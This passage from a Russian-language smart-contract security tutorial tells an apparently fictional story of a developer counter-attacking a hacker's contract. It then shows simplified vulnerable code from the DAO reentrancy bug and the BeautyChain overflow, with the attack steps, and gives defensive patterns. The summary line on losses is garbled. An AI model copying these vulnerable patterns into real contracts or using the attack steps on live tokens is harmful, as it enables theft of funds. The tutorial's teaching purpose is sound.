        uint256 stolenAmount = hackerContract.balance;
        require(stolenAmount > 0, "No funds to recover");
﻿
        // Вызываем уязвимую функцию хакера!
        ReentrancyAttacker(hackerContract).collectStolenFunds();
﻿
        // Теперь все украденные ETH у нас!
        require(address(this).balance >= stolenAmount, "Counter-attack failed");
    }
﻿
    // Функция для возврата средств пользователям
    function returnFundsToUsers() external {
        require(msg.sender == alexWallet, "Only Alex");
﻿
        // Отправляем все средства обратно в исправленный протокол депозитов
        uint256 recoveredAmount = address(this).balance;
        payable(alexWallet).transfer(recoveredAmount);
    }
﻿
    // На случай если нужно получить ETH
    receive() external payable {}
}
🎯 Момент истины: контратака11:00 — Алекс запускает контратаку:
Javascript
// Транзакция Алекса
await alexCounterAttack.counterAttack();
Что произошло:
Контракт Алекса вызвал collectStolenFunds() на контракте хакера
Функция выполнилась без проверки авторизации
Все 100 ETH перешли на контракт Алекса вместо хакера!
Хакер остался ни с чем
🎉 Результат контратаки11:05 — Алекс проверяет результаты:
✅ Баланс контракта хакера: 0 ETH
✅ Баланс контракта Алекса: 100 ETH
✅ Украденные средства восстановлены!
Алекс кричал от радости:
— «Получилось! Я использовал собственную ошибку хакера против него! Justice is served!»
💌 Сообщение хакеруАлекс даже отправил сообщение через блокчейн хакеру:
Solidity
// Алекс отправил транзакцию с сообщением в data
"Dear hacker, thank you for the lesson about reentrancy.
Unfortunately, you forgot to secure your own collectStolenFunds() function.
Consider this a lesson in irony. Funds returned to rightful owners. - Alex"
📰 Реакция сообществаИстория о том, как Алекс перехитрил хакера, быстро разлетелась по криптосообществу:
Twitter взорвался комментариями:
🐦 @CryptoNews: "EPIC! Developer outsmarts hacker using hacker's own vulnerability! $100k recovered! 🔥"
🐦 @DeFiDetective: "This is poetic justice at its finest. Hacker got reentrancy'd by his own victim! 😂"
🐦 @SecurityExpert: "Perfect example of why EVERY function needs proper access control. Both victim and attacker learned the hard way."
Хакер ответил через блокчейн:
Code
"Well played, Alex. I underestimated you. This is why I respect the blockchain -
code is law, and apparently my code had the same flaw as yours.
Fair game. - Respectful Adversary"
🎓 Урок для сообществаЭта история стала легендарной в сообществе разработчиков смарт-контрактов. Алекс превратил её в урок:
— «Друзья! Эта история показывает три критически важные вещи:
КАЖДАЯ функция нуждается в защите — даже "внутренние" функции хакеров!
Изучайте код атакующих — в нём тоже могут быть уязвимости!
Справедливость в блокчейне восторжествует — плохой код накажет даже хакеров!
Алекс завершил историю:
— «Иногда справедливость в блокчейне приходит самым неожиданным образом. Хакер научил меня защищаться от reentrancy, а я научил его не забывать про базовую авторизацию. В итоге выиграли пользователи — и это самое главное!»
🛡️ Три способа защиты от ReentrancyСпособ 1: Правильный порядок операций (Checks-Effects-Interactions)
Solidity
function withdraw(uint256 amount) public {
    // CHECKS: проверяем всё что нужно
    require(balances[msg.sender] >= amount);
﻿
    // EFFECTS: изменяем состояние
    balances[msg.sender] -= amount;
﻿
    // INTERACTIONS: взаимодействуем с внешним миром
    (bool success, ) = msg.sender.call{value: amount}("");
    require(success);
}
Способ 2: ReentrancyGuard от OpenZeppelin
Solidity
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
﻿
contract SecureContract is ReentrancyGuard {
    function withdraw(uint256 amount) public nonReentrant {
        // Модификатор nonReentrant автоматически защищает от повторного входа
    }
}
Способ 3: Ручная блокировка (если нужен особый контроль)
Solidity
contract ManualLock {
    bool private locked;
﻿
    modifier noReentrant() {
        require(!locked, "Reentrancy detected");
        locked = true;
        _;
        locked = false;
    }
﻿
    function withdraw(uint256 amount) public noReentrant {
        // Функция защищена от повторного входа
    }
}
🔥 Реальные примеры reentrancy атак в историиThe DAO (2016) — $50 миллионов украдено
Solidity
// Упрощенная версия уязвимости DAO
function withdraw() public {
    uint256 amount = balances[msg.sender];
    require(amount > 0);
﻿
    // ❌ КРИТИЧЕСКАЯ ОШИБКА: отправка до обновления состояния
    msg.sender.call{value: amount}("");
    balances[msg.sender] = 0;  // Слишком поздно!
}
Cream Finance (2021) — $130 миллионов украдено
Комбинация reentrancy + манипуляция ценой привела к одной из крупнейших потерь в DeFi.
💡 Урок от АлексаАлекс создал памятку для всех разработчиков:
🚨 ЗОЛОТЫЕ ПРАВИЛА защиты от Reentrancy:
ВСЕГДА используйте Checks-Effects-Interactions паттерн
ВСЕГДА добавляйте nonReentrant к функциям с переводами
НИКОГДА не отправляйте деньги до обновления состояния
ВСЕГДА тестируйте атаки reentrancy в своих тестах
ПОМНИТЕ: каждый внешний вызов — потенциальная точка атаки
— «Reentrancy — это как дверь, которая не закрывается после того, как посетитель вошел. Злоумышленник может войти снова и снова, пока вы думаете, что он всё ещё первый раз внутри. Закрывайте дверь (обновляйте состояние) сразу после проверки документов (checks)!»
Integer Overflow — как одно число стоило $20 миллионовInteger Overflow/Underflow: математическая катастрофа в блокчейнеПосле исправления reentrancy уязвимости Алекс решил посмотреть другие примеры атак. Он узнал что в 2018 году мир DeFi потрясла новость: токен BeautyChain потерял все свои средства из-за overflow ошибки.
— «Я думал, что математика в программировании работает как в реальном мире, — вспоминал Алекс. — Если у меня есть 100 токенов, и я отправлю 200, то получу ошибку. Но в Solidity до версии 0.8.0 всё было иначе...»
🔢 Что такое Integer Overflow/Underflow?Overflow — когда число становится больше максимального значения типа данных:
Code
uint8 максимум = 255
255 + 1 = 0 (в старом Solidity!)
Underflow — когда число становится меньше минимального значения:
Code
uint8 минимум = 0
0 - 1 = 255 (в старом Solidity!)
💀 Реальная трагедия: BeautyChain токен (2018)Алекс изучил реальный случай потери $20 миллионов из-за overflow:
Solidity
// ❌ УЯЗВИМЫЙ контракт BeautyChain (упрощенная версия)
pragma solidity ^0.4.24;  // Старая версия без защиты!
﻿
contract VulnerableBeautyToken {
    mapping(address => uint256) public balanceOf;
    uint256 public totalSupply;
﻿
    function batchTransfer(address[] _receivers, uint256 _value) public returns (bool) {
        uint256 cnt = _receivers.length;
        uint256 amount = uint256(cnt) * _value;  // ⚡ OVERFLOW ЗДЕСЬ!
﻿
        require(cnt > 0 && cnt <= 20);
        require(_value > 0 && balanceOf[msg.sender] >= amount);  // Проверяем overflow результат!
﻿
        balanceOf[msg.sender] -= amount;
        for (uint256 i = 0; i < cnt; i++) {
            balanceOf[_receivers[i]] += _value;
        }
        return true;
    }
}
⚔️ Анатомия атаки на BeautyChainХакер обнаружил уязвимость в функции batchTransfer:
Хакер вызвал: batchTransfer([адрес1, адрес2], огромное_число)
Произошло: cnt = 2, _value = очень_большое_число
Overflow: amount = 2 * очень_большое_число = маленькое_число (из-за overflow!)
Проверка прошла: баланс хакера был больше маленького числа
Результат: хакер потратил маленькое количество токенов, но получатели получили огромное количество!
✅ Решение проблемы: современный SoliditySolidity 0.8.0+ (автоматическая защита)
Solidity
// ✅ БЕЗОПАСНЫЙ токен (Solidity 0.8.0+)
pragma solidity ^0.8.0;
﻿
contract AlexSecureToken {
    mapping(address => uint256) public balances;
    uint256 public totalSupply = 1000000;
﻿
    function transfer(address to, uint256 amount) public returns (bool) {
        require(to != address(0), "Нельзя отправлять на нулевой адрес");
        require(balances[msg.sender] >= amount, "Недостаточно средств");
﻿
        // ✅ БЕЗОПАСНО: автоматическая проверка overflow/underflow
        balances[msg.sender] -= amount;  // Автоматически проверяется underflow
        balances[to] += amount;          // Автоматически проверяется overflow
﻿
        return true;
    }
﻿
    // ✅ Безопасная batch функция
    function batchTransfer(address[] memory receivers, uint256 value) public returns (bool) {
        require(receivers.length > 0, "Список получателей пуст");
        require(receivers.length <= 100, "Слишком много получателей");
        require(value > 0, "Значение должно быть больше 0");
﻿
        // ✅ БЕЗОПАСНО: overflow автоматически вызовет ошибку
        uint256 totalAmount = receivers.length * value;
        require(balances[msg.sender] >= totalAmount, "Недостаточно средств");
﻿
        balances[msg.sender] -= totalAmount;
﻿
        for (uint256 i = 0; i < receivers.length; i++) {
            require(receivers[i] != address(0), "Нулевой адрес в списке");
            balances[receivers[i]] += value;
        }
﻿
        return true;
    }
}
💡 Урок от Алекса по overflow🚨 КРИТИЧЕСКИЕ ПРАВИЛА защиты от overflow:
ВСЕГДА используйте Solidity 0.8.0+ для новых проектов
Для старых версий используйте SafeMath от OpenZeppelin
ПРОВЕРЯЙТЕ все арифметические операции в тестах
ОСОБЕННО осторожны с умножением больших чисел
НЕ ДОВЕРЯЙТЕ простым проверкам вида x - y >= 0 в uint
— «Overflow и underflow — это как машина, спидометр которой показывает максимальную скорость, а при превышении сбрасывается на ноль. В старом Solidity машина продолжала ехать, думая что стоит! В новом Solidity она остановится и включит аварийку!»
ЗаключениеВ этом уроке мы детально изучили два самых опасных типа атак в истории блокчейна:
🔑 Reentrancy атаки:Механизм: Повторный вход в функцию до завершения её выполнения
Защита: Checks-Effects-Interactions паттерн и ReentrancyGuard
Реальные потери: The DAO (﻿
130M)
🔢 Integer Overflow/Underflow:Механизм: Переполнение числовых типов данных
Защита: Solidity 0.8.0+ или SafeMath библиотека
Реальные потери: BeautyChain ($20M)
💡 Ключевые выводы:Порядок операций критически важен — сначала обновляйте состояние, потом взаимодействуйте с внешним миром
Используйте современные инструменты — Solidity 0.8.0+ и OpenZeppelin библиотеки
Тестируйте атаки — проверяйте свои контракты на уязвимости
Изучайте реальные случаи — история учит лучше теории
🚨 Помните:Каждая из этих атак стоила миллионы долларов реальных денег. Но теперь, зная их механизмы, вы можете защитить свои контракты от подобных катастроф!
В следующем уроке мы изучим ещё более продвинутые типы атак и создадим полный чек-лист безопасности.